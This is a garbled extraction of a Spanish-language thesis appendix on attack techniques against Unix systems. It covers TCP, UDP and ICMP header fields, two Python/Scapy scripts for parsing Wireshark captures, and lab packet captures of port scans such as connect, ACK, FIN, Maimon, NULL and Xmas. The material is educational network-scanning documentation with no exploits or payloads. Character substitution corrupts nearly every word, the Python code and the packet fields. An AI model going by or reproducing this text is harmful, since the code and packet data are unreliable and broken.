4indoI ,ize N Fa aBo de Lentana ;*J Bits>% Fa aBo en b'tes de la ventana rece"tora# "arte del C$ec6su ;*J Bits>% ,u a de co "robaci8n ;c$equeo "or errores> del

encabezado ' de los datos.

!untero 2rgente ;*J Bits>% ,i el bit 2<P está activado# este valor es el des"laza iento ;offset> que $a' que su ar al valor del @G ero de ,ecuencia "ara obtener el Glti o b'te de los datos urgentes. 0pciones ;Lariable>% =a' o"ciones FC! de/inidas en <FCs "osteriores al +0* ' que se utilizan co Gn ente# co o "or eje "lo el ,ACR# 4indoI ,cale ' M,, ;/aximum Segment Si$e>.

A.-. !rotocolo 25! N Encabezado
(it 466set 0 2 6. (its 0 & 11 2ongitu7 Dato 16 & 1 Puerto KDP Origen - .our!e Port Puerto KDP De tino - De tination Port ,'e!6 um

5escri"ci8n breve de los ca "os S47R7U25!T%

4uerto 0ri)en ;*J Bits>% 2 B'tes indicando el "uerto de origen del datagra a 25!. !uede que no sea necesario# en ese caso deber)a ser ..

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-1 de 2*.

Ane9o A. ( A.-.!rotocolo 25! N Encabezado

4uerto Destino ;*J Bits>% 2 B'tes indicando el "uerto destino del datagra a 25!. Lon)itud ;*J Bits>% :ongitud en b'tes del datagra a co "leto# encabezado ' datos. /9ec:sum ;*J Bits>% ,u a de co "robaci8n del datagra a co "leto.

A.1. !rotocolo 7CM! N Encabezado
(it 466set 0 2 (its 0 & 0 Tipo 7e 8,3P (its 8&11 ,%7igo (its 16& 1 ,'e!6 um N^mero 7e .e!uen!ia

8D \ 87entifi!a7or

5escri"ci8n breve de los ca "os S47R7U7CM!T%

Tipo de I/14 ;O Bits>% Corres"onde al ti"o de "aquete 7CM!# "or eje "lo .9O es un Ec$o <equest ;!ing> ' un .9. un Ec$o <e"l' ;!ong># un .9- es un 5estination 2nreac$able. En la co binar con el c8digo. ientras que a'or)a de casos co o este

Glti o# "ara obtener el signi/icado co "leto del "aquete 7CM! se lo debe /-di)o ;O Bits>% En caso de que sea necesario ;"ara algunos ti"os de "aquete 7CM!># este ca "o brinda ás in/or aci8n. !or eje "lo# si el ca "o Fi"o es igual a .9-# este ca "o "uede tener valores desde el . ;<ed 5estino 7nalcanzable ( (estination Get.ork Unreac able> al *- ;Co unicaci8n Ad inistrativa ente Pro ibited>.
● ●

!ro$ibida

N

&ommunication

4dministrativel1

/9ec:sum ;*J Bits>% ,u a de co "robaci8n del encabezado _ datos. ID Q Identi=icador ;*J Bits>% Este ca "o contiene un valor Gnico de identi/icaci8n# que deber)a ser retornado en caso de un Ec$o <e"l'. N'mero de Aecuencia ;*J Bits>% Este ca "o se inicializa en . en el "ri er Ec$o <equest ' luego es incre entado en cada env)o.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-5 de 2*.

Ane9o A. ( A.5.FC! N 5iagra a de Fransici8n de Estados

A.5. FC! N 5iagra a de Fransici8n de Estados
FC! es un "rotocolo identi/icado /uerte ente con di/erentes estados en la vida de una cone9i8n S47R7UFC!T.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-J de 2*.

Ane9o B. ( Ane9o B. Acerca de las Ca"turas de Frá/ico

Anexo &. Acerca de las /apturas de Trá=ico
En este ane9o se vuelcan la ca"turas de trá/ico de red realizadas co o docu entaci8n. Fodas /ueron generadas con el so/tIare 4ires$ar6*+* v..00.J# inclu)do en la versi8n +.*. de 2buntu P@2&:inu9*+2 "ara la arquitectura AM5J1. !or otra "arte# el $ost que /igura con la 7! *02.*JO...2 ;C,aturnoD> es el /)sico# ientras el resto consist)an en si ulaban "ertenecer a la con/igurados ' utilizados% Nom(re
,aturno Fornado Ciclon Frueno Fsuna i

áquinas virtuales creadas ' ad inistradas "or el áquinas

so/tIare LM4are 4or6station*+- J...- "ara AM5J1. Fodas las is a <ed :A@ ;*02.*JO....&21>.

En la siguiente tabla se describen algunas caracter)sticas de los $osts I4
*02.*JO...2 *02.*JO...2. *02.*JO...-. *02.*JO...J. *02.*JO...*..

RA1
*#5PB *2OMB 25JMB 25JMB 25JMB

Aistema 0perativo
2buntu P@2&Linux +.*. 5es6to" N Rernel +.#.++ 0pen&AD 2ni9 <.+ . J1 Bits 2ree&AD 2ni9 ".$ ( J1 Bits 2buntu P@2&Linux J..J.2 ,erver N Rernel +.#.7 <ed =at Linux J.2 N Rernel +.+.7<

B.*. ,cri"ts "ara !rocesar las Ca"turas
Ade ás# se utilizaron dos scri"ts en el lenguaje !'t$on*+1 "ara "rocesar# /iltrar ' resu ir la in/or aci8n de las ca"turas. El "ri ero# parser.p!% /ue utilizado al generar el resu en docu ento ostrado "ara todas las ca"turas de este uestre es"ecial ente el enos la del 7dle ,can ;,ecci8n 1.-.+# "ág. 5*> ' la del !rotocol ,can

;,ecci8n 1.-.0# "ág.J1>. Este Glti o requer)a que se A continuaci8n se
N`;u r;bin;pEt'on N -Q- !o7ing: utf-) -Qimport E import ! @

ca "o 7!(75# "or lo que se cre8 otro scri"t "ara $acerlo "osible% pcapRparser.p!. uestra el c8digo /uente de a bos scri"ts.

VVV parser.pD < te m%7u"o obtiene un ! @ eDporta7o 7e &ire 'ar6 E "o formatea para que o!upe meno an!'o4 a!]n7o"o por t7out. #utor: 3ar!e"o Bern]n7eO

*+* ,itio del Ca"turador de Frá/ico de <ed 4ires$ar6% $tt"%&&III.Iires$ar6.org& *+2 ,itio del ,iste a ?"erativo 2buntu P@2&:inu9% $tt"%&&III.ubuntu.co *+- ,itio de LM4are% $tt"%&&III.v Iare.co *+1 ,itio del lenguaje !'t$on% $tt"%&&III."'t$on.org Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-+ de 2*.

Ane9o B. ( B.*.,cri"ts "ara !rocesar las Ca"turas
VVV temp"ateAip 1 VVVPaquete Nro: S - Tiempo: S 8P Origen: S :S -> 8P De tino: S :S Proto!o"o: S De !rip!i%n: S VVV temp"ateAma! 1 VVVPaquete Nro: S - Tiempo: S 3a! Origen: S -> 3a! De tino: S 8P Origen: S :S -> 8P De tino: S :S Proto!o"o: S De !rip!i%n: S VVV T<3P2#T< 1 temp"ateAma! i6 AAnameAA 11 JAAmainAAJ: i6 "en9 E .arg@: > 1: # Tengo un parámetro, debe ser el archivo ar!'i@oA! @ 1 E .arg@-10 else: print V3o7o 7e u o: pEt'on par er.pE ar!'i@oA>ire 'ar6.! @V E .eDit91: trD: f 1 open9ar!'i@oA! @4VrbV: e,cept I4Crror: print V#r!'i@o S no en!ontra7oV S ar!'i@oA! @ E .eDit9(: "e!torA! @ 1 ! @.rea7er9f: VVV Obtengo "o tZtu"o E "uego4 regi tro por regi tro4 @oE imprimien7o VVV titu"o 1 "e!torA! @.neDt9: 6or " in "e!torA! @: print T<3P2#T< S tup"e9": N`;u r;bin;pEt'on N -Q- !o7ing: utf-) -Qimport import E !apE

VVV pcapNparser.pD < te !ript !arga un ar!'i@o p!ap guar7a7o por eYemp"o !on &ire 'ar6 E re!on truir u paquete !on .!apE4 para !ua"quier obYeti@o 9por eYemp"o4 ir@e para 'a!er rep"aE 7e a"guna trama 4 paquete o egmento 4 a !ua"quier ni@e":. <n e te !a o en parti!u"ar4 e" main itera por !a7a paquete 7e" p!ap E ""ama a una fun!ion VprintApa!6etV para que "a imprima por t7out. 2a @entaYa !ontra e" eDport 7e &ire 'ar6 e que pue7o imprimir !ua"quier !ampo a !ua"quier ni@e" 7e !a7a paquete4 obtenien7o un !ontro" tota" 7e" pro!e o. .urgi% !omo ne!e i7a7 7e formatear un 87"e .!an4 7on7e era ne!e ario mo trar e" 8P-8D 7e !a7a paquete 7e" Uombie. Te!ni!a para temp"ate en!i""o : 'ttp:;;>>>.noa'.org;>i6i;PEt'onAtemp"ate

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-O de 2*.

Ane9o B. ( B.*.,cri"ts "ara !rocesar las Ca"turas
$e"a!iona7o: - Para @er paquete obteni7o !on !apE !on >ire 'ar6: 'ttp:;;tra!. e!7e@.org; !apE;>i6i;=ie>ingPa!6et &it'&ire 'ar6 - .i e obtiene e to por !on o"a 9Kbuntu 7.10 AD)6-6+::

8n -10: from !apE import Q <$$O$: <rror 7uring e@a"uation of !onfig fi"e -None0 Tra!eba!6 9mo t re!ent !a"" "a t:: Bi"e V;@ar;"ib;pEt'on- upport;pEt'on(.5; !apE.pEV4 "ine 1(1)54 in rea7A!onfigAfi"e eDe!fi"e9!onfigfi"e: TEpe<rror: eDe!fi"e9: argument 1 mu t be tring4 not None ,rear e" ar!'i@o d;. !apEA tartup.pE4 !on e" !oman7o Vtou!' d;. !apEA tartup.pEV #utor: 3ar!e"o Bern]n7eO VVV N < !apo to7o "o !ampo que quiero que pare ee !apE !on SS T<3P2#T< 1 VVVPaquete nro. S - Tiempo Sf 3a! Origen: SS<t'er. r!SS -> 3a! De tino: SS<t'er.7 tSS 8P Origen: SS8P. r!SS -> SS8P.7 tSS 8P ?ea7er: =er ion:SS8P.@er ionSS 2en:SS8P."enSS 8D:SS8P.i7SS Brag:S S8P.fragSS TT2:SS8P.tt"SS 9...: T,P ?ea7er: .Port:SSr4T,P. portSS DPort:SSr4T,P.7portSS .eqN:SST,P. eqSS #!6N:SST,P.a!6SS B"ag :0DSS0(Dr4T,P.f"ag SS9SST,P.f"ag SS: &n7:S ST,P.>in7o>SS 9...: De !rip!ion: S VVV T<3P2#T<A8,3P 1 VVVPaquete nro. S - Tiempo Sf 8P Origen: SS8P. r!SS -> SS8P.7 tSS 8P ?ea7er: =er ion:SS8P.@er ionSS Proto:0DSS0(Dr48P.protoSS 9SS8P.protoS S: 9...: 8,3P ?ea7er: Tipo:0DSS0(Dr48,3P.tEpeSS ,o7igo:SS8,3P.!o7eSS De !rip!ion: S VVV de6 printApa!6et 9paquete :: VVV < ta fun!ion re!ibe una "i ta 7e in tan!ia 7e imprime 7e a!uer7o a "a @ariab"e temp"ate. VVV !apE.<t'er E "o no me gusta,

# El formato Pcap guarda el tiempo desde el Epoch, a m # prefiero en relaci!n a la primera trama capturada OeroAtime 1 paquete -00.time in7eD 1 0

6or p in paquete : in7eD P1 1 re"ati@eAtime 1 p.time - OeroAtime # "rmo un template dinámico para pasarle al sprintf#) VVV < t] 7i ponib"e tambiXn "a 6eEname prn para imprimir a"go en parti!u"ar E "a "fi"ter para fi"trar por a"g^n par]metro paquete . ummarE9prn 1 "amb7a9p:: p.fie"7 : paquete . ummarE9"fi"ter 1 "amb7a9p:: p-T,P0. r! 11 V19(.16).0.(V:VVV temp"ate 1 T<3P2#T< S 9in7eD4 re"ati@eAtime4 p. ummarE9:: print p. printf9temp"ate:

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *-0 de 2*.

Ane9o B. ( B.*.,cri"ts "ara !rocesar las Ca"turas
i6 AAnameAA 11 JAAmainAAJ: i6 "en9 E .arg@: > 1: # Tengo un parámetro, debe ser el archivo ar!'i@oAp!ap 1 E .arg@-10 else: print V3o7o 7e u o: pEt'on p!apApar er.pE ar!'i@oAp!ap.!apV E .eDit91: trD: paquete 1 !apE.r7p!ap9ar!'i@oAp!ap: e,cept I4Crror: print V#r!'i@o S no en!ontra7oV S ar!'i@oAp!ap E .eDit9(: printApa!6et 9paquete :

B.2. :as Ca"turas en 5etalle
!or Glti o# se docu entan las ca"turas realizadas# junto con el nG ero a la cual re"resentan. 5ado que las ca"turas en s) se al acenan original ente en el /or ato binario !ca"# aqu) se uestran las versiones inter"retadas. ,in e bargo# se reco ienda descargar libre ente el "aquete co "ri ido con ca"turas binarias# inter"retaciones# ' scri"ts de este ane9o desde la siguiente 2<:% $tt"%&&III. arcelo/ernandez.in/o&tesis&Ane9oB(Ca"turas.tar.gz ' abrirlas con algGn so/tIare# co o "or eje "lo 4ires$ar6# "ara investigar en "ro/undidad. a'or

B.2.*. Ca"tura *% !uerto Abierto
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.0011)7 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0356+0 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: + - Tiempo: 0.036((+ 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 5 - Tiempo: 0.036(+3 8P Origen: 19(.16).0.(:5)071 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5)071 > (( -./N0 .eq10 2en10 3..11+60 Paquete Nro: 6 - Tiempo: 0.039((0 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:5)071 Proto!o"o: T,P De !rip!i%n: (( > 5)071 -./N4 #,50 .eq10 #!611 &in165535 2en10 3..11+60

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *1. de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: 7 - Tiempo: 0.039(66 8P Origen: 19(.16).0.(:5)071 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5)071 > (( -$.T0 .eq11 2en10

B.2.2. Ca"tura 2% !uerto Cerrado
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.035)+9 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0696(6 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: + - Tiempo: 0.069991 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 5 - Tiempo: 0.07000) 8P Origen: 19(.16).0.(:61609 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 61609 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: 6 - Tiempo: 0.070331 8P Origen: 19(.16).0.30:)0 -> 8P De tino: 19(.16).0.(:61609 Proto!o"o: T,P De !rip!i%n: )0 > 61609 -$.T4 #,50 .eq10 #!611 &in10 2en10

B.2.-. Ca"tura -% !uerto 25! Cerrado
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.00+7(0 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0+1151 8P Origen: 19(.16).0.(:635() -> 8P De tino: 19(.16).0.30:53 Proto!o"o: DN. De !rip!i%n: -3a"forme7 Pa!6et0 Paquete Nro: + - Tiempo: 0.0+153+ 8P Origen: 19(.16).0.30: -> 8P De tino: 19(.16).0.(: Proto!o"o: 8,3P De !rip!i%n: De tination unrea!'ab"e 9Port unrea!'ab"e:

B.2.1. Ca"tura 1% !uerto Filtrado
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.(

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *1* de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: ( - Tiempo: 0.000()3 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0+059) 8P Origen: 19(.16).0.(:37555 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 37555 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: + - Tiempo: 0.15369) 8P Origen: 19(.16).0.(:37556 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 37556 > )0 -./N0 .eq10 2en10 3..11+60

B.2.5. Ca"tura 5% Connect ,can
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.0007)0 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.000795 8P Origen: 19(.16).0.(:57)59 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -./N0 .eq10 2en10 3..11+60 T.=1)376003 T.<$10 &.17 Paquete Nro: + - Tiempo: 0.0009)5 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:57)59 Proto!o"o: T,P De !rip!i%n: (( > 57)59 -./N4 #,50 .eq10 #!611 &in1131070 2en10 3..11+60 &.11 T.=1(13))76) T.<$1)376003 Paquete Nro: 5 - Tiempo: 0.00101+ 8P Origen: 19(.16).0.(:57)59 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -#,50 .eq11 #!611 &in15))) 2en10 T.=1)37600+ T.<$1(13))76) Paquete Nro: 6 - Tiempo: 0.039)61 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:57)59 Proto!o"o: ..? De !rip!i%n: .er@er Proto!o": ..?-(.0-Open..?A+.5p1 BreeC.D-(0061110 Paquete Nro: 7 - Tiempo: 0.039)99 8P Origen: 19(.16).0.(:57)59 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -#,50 .eq11 #!61+0 &in15))) 2en10 T.=1)37601+ T.<$1(13)))75 Paquete Nro: ) - Tiempo: 0.057+67 8P Origen: 19(.16).0.(:57)59 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -$.T4 #,50 .eq11 #!61+0 &in15))) 2en10 T.=1)376019 T.<$1(13)))75

B.2.J. Ca"tura J% ACR ,can
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000(69

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *12 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.031)9) 8P Origen: 19(.16).0.(:3++90 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 3++90 > (( -#,50 .eq10 #!610 &in110(+ 2en10 Paquete Nro: + - Tiempo: 0.03(16( 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: (( > 3++90 -$.T0 .eq10 2en10 Paquete Nro: 5 - Tiempo: 0.03(3(1 8P Origen: 19(.16).0.(:3++90 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 3++90 > )0 -#,50 .eq10 #!610 &in1(0+) 2en10 Paquete Nro: 6 - Tiempo: 0.03(396 8P Origen: 19(.16).0.30:)0 -> 8P De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: )0 > 3++90 -$.T0 .eq10 2en10

B.2.+. Ca"tura +% ACR ,can Filtrado
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000697 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.036039 8P Origen: 19(.16).0.(:35)37 -> 8P De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)37 > )0)0 -#,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: + - Tiempo: 0.1+(6(7 8P Origen: 19(.16).0.(:35)3) -> 8P De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)3) > )0)0 -#,50 .eq10 #!610 &in110(+ 2en10

B.2.O. Ca"turas O% Fin# Mai on# @ull ' A as ,cans
B.2.O.* Fin ,can
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.0003(0 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.0(9559 8P Origen: 19(.16).0.(:5+9+3 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5+9+3 > (( -B8N0 .eq10 2en10 Paquete Nro: + - Tiempo: 0.0(97+3 8P Origen: 19(.16).0.(:5+9+3 -> 8P De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 5+9+3 > )0)0 -B8N0 .eq10 2en10

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *1- de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: 5 - Tiempo: 0.0(9))1 8P Origen: 19(.16).0.30:)0)0 -> 8P De tino: 19(.16).0.(:5+9+3 Proto!o"o: T,P De !rip!i%n: )0)0 > 5+9+3 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 6 - Tiempo: 0.030)9) 8P Origen: 19(.16).0.(:5+9+3 -> 8P De tino: 19(.16).0.30:110 Proto!o"o: T,P De !rip!i%n: 5+9+3 > 110 -B8N0 .eq10 2en10 Paquete Nro: 7 - Tiempo: 0.0310)9 8P Origen: 19(.16).0.30:110 -> 8P De tino: 19(.16).0.(:5+9+3 Proto!o"o: T,P De !rip!i%n: 110 > 5+9+3 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: ) - Tiempo: 1.1+951+ 8P Origen: 19(.16).0.(:5+9++ -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5+9++ > (( -B8N0 .eq10 2en10

B.2.O.2 Mai on ,can
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000339 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.035+59 8P Origen: 19(.16).0.(:61763 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 61763 > )0 -B8N4 #,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: + - Tiempo: 0.035736 8P Origen: 19(.16).0.30:)0 -> 8P De tino: 19(.16).0.(:61763 Proto!o"o: T,P De !rip!i%n: )0 > 61763 -$.T0 .eq10 2en10 Paquete Nro: 5 - Tiempo: 0.035)1) 8P Origen: 19(.16).0.(:61763 -> 8P De tino: 19(.16).0.30:(5 Proto!o"o: T,P De !rip!i%n: 61763 > (5 -B8N4 #,50 .eq10 #!610 &in110(+ 2en10 Paquete Nro: 6 - Tiempo: 0.035911 8P Origen: 19(.16).0.30:(5 -> 8P De tino: 19(.16).0.(:61763 Proto!o"o: T,P De !rip!i%n: (5 > 61763 -$.T0 .eq10 2en10 Paquete Nro: 7 - Tiempo: 0.035971 8P Origen: 19(.16).0.(:61763 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 61763 > (( -B8N4 #,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: ) - Tiempo: 0.036(51 8P Origen: 19(.16).0.30:(( -> 8P De tino: 19(.16).0.(:61763 Proto!o"o: T,P De !rip!i%n: (( > 61763 -$.T0 .eq10 2en10

B.2.O.- @2:: ,can
Paquete Nro: 1 - Tiempo: 0.000000 8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.(

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. *11 de 2*.

Ane9o B. ( B.2.:as Ca"turas en 5etalle
Paquete Nro: ( - Tiempo: 0.000+31 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.03(196 8P Origen: 19(.16).0.(:5+999 -> 8P De tino: 19(.16).0.30:(5 Proto!o"o: T,P De !rip!i%n: 5+999 > (5 -0 .eq10 2en10 Paquete Nro: + - Tiempo: 0.03(+37 8P Origen: 19(.16).0.30:(5 -> 8P De tino: 19(.16).0.(:5+999 Proto!o"o: T,P De !rip!i%n: (5 > 5+999 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 5 - Tiempo: 0.03(51) 8P Origen: 19(.16).0.(:5+999 -> 8P De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 5+999 > )0 -0 .eq10 2en10 Paquete Nro: 6 - Tiempo: 0.03(60+ 8P Origen: 19(.16).0.30:)0 -> 8P De tino: 19(.16).0.(:5+999 Proto!o"o: T,P De !rip!i%n: )0 > 5+999 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 7 - Tiempo: 0.03(667 8P Origen: 19(.16).0.(:5+999 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 5+999 > (( -0 .eq10 2en10 Paquete Nro: ) - Tiempo: 1.1+799+ 8P Origen: 19(.16).0.(:55000 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 55000 > (( -0 .eq10 2en10

B.2.O.1 A as ,can
8P Origen: 00:17:31:96:5b:1f: -> 8P De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( - Tiempo: 0.000300 8P Origen: 00:0!:(9:e1:a(:(6: -> 8P De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 - Tiempo: 0.031)96 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 357(5 > (( -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: + - Tiempo: 0.03(109 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(1 Proto!o"o: T,P De !rip!i%n: 357(5 > (1 -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: 5 - Tiempo: 0.03((17 8P Origen: 19(.16).0.30:(1 -> 8P De tino: 19(.16).0.(:357(5 Proto!o"o: T,P De !rip!i%n: (1 > 357(5 -$.T4 #,50 .eq10 #!610 &in10 2en10 Paquete Nro: 6 - Tiempo: 0.03(()7 8P Origen: 19(.16).0.(:357(5 -> 8P De tino: 19(.16).0.30:(0 Proto!o"o: T,P De !rip!i%n: 357(5 > (0 -B8N4 P.?4 K$H0 .eq10 Krg10 2en10 Paquete Nro: 7 